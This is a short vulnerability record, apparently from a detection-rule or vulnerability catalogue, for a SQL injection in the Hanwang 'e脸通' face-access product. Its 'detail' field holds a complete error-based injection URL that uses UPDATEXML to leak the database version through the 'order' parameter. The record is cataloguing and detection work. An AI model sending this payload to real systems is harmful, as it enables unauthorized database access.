vendor = "汉王"
name = "汉王e脸通getGroupEmployee.do SQL注入"
type = "SQL注入"
version = "未知"
path = "/manage/authMultiplePeople/getGroupEmployee.do"
detail = "/manage/authMultiplePeople/getGroupEmployee.do?recoToken=67mds2pxXQb&page=1&pageSize=10&groupId=1&order=(UPDATEXML(2920,CONCAT(0x7e,@@version,0x7e,(SELECT+(ELT(123=123,1)))),8357))"
fix = "缺省规则可检出"
date = "0704"
label = "1day"
verifier = "AdySec"
